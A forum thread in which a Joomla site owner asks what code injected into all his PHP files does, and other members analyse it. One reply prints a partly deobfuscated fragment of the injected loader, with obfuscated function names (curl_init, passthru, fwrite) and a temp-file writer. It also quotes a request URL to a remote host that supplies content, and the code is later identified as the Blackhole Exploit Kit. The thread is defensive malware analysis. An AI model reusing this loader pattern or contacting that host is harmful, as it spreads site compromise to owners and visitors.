HACK CODE TO BE EXPLANED

Viewing 15 reply threads
  • Author
    Posts
    • #6013
      alexsp
      Participant

      hello there to the ethical hacker community, at the start of the attached file there is code that i found to all .php files that exist on a site that was hacked. If the code seems interesting to anyone, some explanation on what the code does would be very helpful so i can secure my site.

    • #37649
      cd1zz
      Participant

      This doesn’t look malicious to me. Why do you think it is?

    • #37650
      alexsp
      Participant

      First of all thanks for the reply, i know this code is malicious because the site was hacked several times and many strange things happened, you know like frontpage replacement from hackers and thiings like that. Secondly because the site is built on joomla and i can distinguish (so can everyone who has been working with joomla) the code that exists on a normal joomla .php page from code that was manually inserted. You can also notice this, the joomla code starts with the joomla credits comments (at line 2!!!).
      Can you tell what the first part of code (the one that is not well lined out well and is before the joomla credits comments) is for? Also if you can see it uses code encoding and decoding, i don’t know, i can post also a normal index.php to view the difference

    • #37651
      alexsp
      Participant

      I forgot to mention that this code has been placed to all .php pages of the site, that is not very common don’t you think? This is actually a professional real hack and i think it is very interesting to be investigated how  this was done…

    • #37652
      RoleReversal
      Participant

      Alexsp,

      I’ve no experience with Joomla, so apologises if this is overly generic. If you can post what the file should be, or just outline which code is added/modified that will help.

      However, whilst this may be a result of a compromise, I’d not expect the code you’ve found to be the first point of intrusion, as any attacker would already need a foothold on the server to be able to add/alter any of your existing source.

      I’d strongly suggest a thorough review of server logs, access, user etc. (basically the usual candidates), as well as a security audit of the code hosted on the site.

      Is this site the only web application running on the server, or is it shared? If shared, it could be that the fault doesn’t existing within your application, but a weakness on a different site has allowed a malicious user to system access to modify source code of otherwise secure web apps.

      Hope this helps.

    • #37653
      alexsp
      Participant

      I am posting an original (“clean”) index.php file of joomla as it should normally be.
      It is obvious that this part of code shouldn’t be there, but even if someone claims that this code is not malicious it means that he or she understands what this code does. So please if you will explain to me too.
      Andrew i know that is not the first point of intrusion, and i know also that joomla has a lot of known vulnerabilitites, but i see a piece of code on the files of a site and i am curious what this does and how.

    • #37654
      RoleReversal
      Participant

      Again, not a Joomla expert so I’m going blind on some things, but:

      ‘Edited’ index file includes two additional php files (helper.php & toolbar.php). Are these a legitimate part of the framework? Are they also edited? Are they required? What do they do?

      looks like the edited file removes an authorisation call, suspicion levels rising…

      Finally, the edited index file looks like to calls a function to get a gzipped copy of the configuration file.

      From my knowledge of Joomla this could be legit (if you’re seeing it across multiple systems, any chance you’ve just upgraded Joomla?). But at worst looks like a data leakage issue, I’d still suggest focusing on locating the original compromise, this looks to be more a symptom than a cause.

      Can anyone shed any additional light?

    • #37655
      alexsp
      Participant

      I agree that is the symptom and not the cause. I would like to say again that this code has been inserted to all php pages, the number of those is very large.
      As for the files you mentioned Andrew helper.php and the other one, yes these files are very common to joomla.
      So only someone that would understand what the code does per line could help right now.
      I am not sure but the first big part looks like a shell to me. 

    • #37656
      RoleReversal
      Participant

      @alexsp wrote:

      I am not sure but the first big part looks like a shell to me. 

      which part? Unless I’m missing something I can’t see anything in the code you’ve uploaded that indicates a shell.

    • #37657
      hayabusa
      Participant

      While, unfortunately, I don’t have time to review code, today…

      My inking, first, would be to setup a LAN sniffer and a test workstation, open the php from the test workstation, trace it, and see what happens…

    • #37658
      n1p
      Participant

      Initial inspection – the initial arguments are set to globals for each function which are extrememly obfuscated:


      $x1e="x63u162x6cx5fx69156ix74";            //curl_init
      $x1f="143165rl137setx6fpx74";                //curl_setopt
      $x20="x63165r154_x65xex63";                  //defined             
      $x23="x66143154x6f163e";           
      $x24="fx69l145x5fgx65tx5f143on164145ntx73";  //file_get_contents
      $x25="146x6f160145x6e";  //fopen
      $x26="fx75nx63x74x69x6f156137x65xi163x74163";  // function_exists
      $x27="146167x72ix74145";  //fwrite
      $x28="x68145a144145x72";  //header
      $x29="x69156151_147e164";  //ini_get
      $x2a="x69s_f151x6ce";      //isfile
      $x2b="x6d1445";        //md5
      $x2c="160a163sx74h162u";    //passthru
      $x2d="strpos";
      $x2e="x73t162t157l157167er";  //strtolower
      $x2f="165rl145nx63odx65";  //urlencode

      Also creates a file in my instance on local file system in Temp folder and writes to that file after making following request

      "http://getpronumber.com/i/rem.php?u=http://yourhost/index.php%3FDBGSESSID%3D405705822416000001%3Bd&k=054bb441428d289666e5cc9692c5420d&t=jm"

      In this instance k is the filename for temp created file…


      function x0e($x10,$x12){
      global $x1e,$x1f,$x20,$x21,$x22,$x23,$x24,$x25,$x26,$x27,$x28,$x29,$x2a,$x2b,$x2c,$x2d,$x2e,$x2f;
      if ($x2a($x10)){        //if(is_file(local temp file))
      $x13=@$x25($x10,'w');    //then open it with w privs
      @$x27($x13,$x12);        //fwrite
      @$x23($x13);              //fclose
      @$x28('Y_Out: b2s=');    //header('Y_Out: b2s=');
      }
      }

      Alot of other code, there I haven’t had a chance to look at. That remote site appears down, but is actually a forbidden index page… Suspicious?

      Given more time I could have a look, but that may help you get started… PM if you want real URL as I didnt want possibly malicious URLs on posting….

      Apologies if not too detailed, I could only look for 10 mins!

      n1p

    • #37659
      cd1zz
      Participant

      n1p

      Which file did that come from?

    • #37660
      n1p
      Participant

      First one provided.. extracted the added code in main index.php and reformatted it..

    • #37661
      cd1zz
      Participant

      I’m an idiot – I didn’t have word wrap on. I’ll take a look now.

    • #37662
      RoleReversal
      Participant

      @cd1zz wrote:

      I’m an idiot – I didn’t have word wrap on. I’ll take a look now.

      +1, I did the same, nothing like a rookie error on a public board :'(

    • #37663
      n1p
      Participant

      Haha, it happens 😛

      Update: After more research, it turns out that it is the Blackhole Exploit Kit.

      http://malwareint.blogspot.com/2010/09/black-hole-exploits-kit-another.html

Viewing 15 reply threads
  • You must be logged in to reply to this topic.

Copyright ©2021 Caendra, Inc.

Contact Us

Thoughts, suggestions, issues? Send us an email, and we'll get back to you.

Sending

Sign in with Caendra

Forgot password?Sign up

Forgot your details?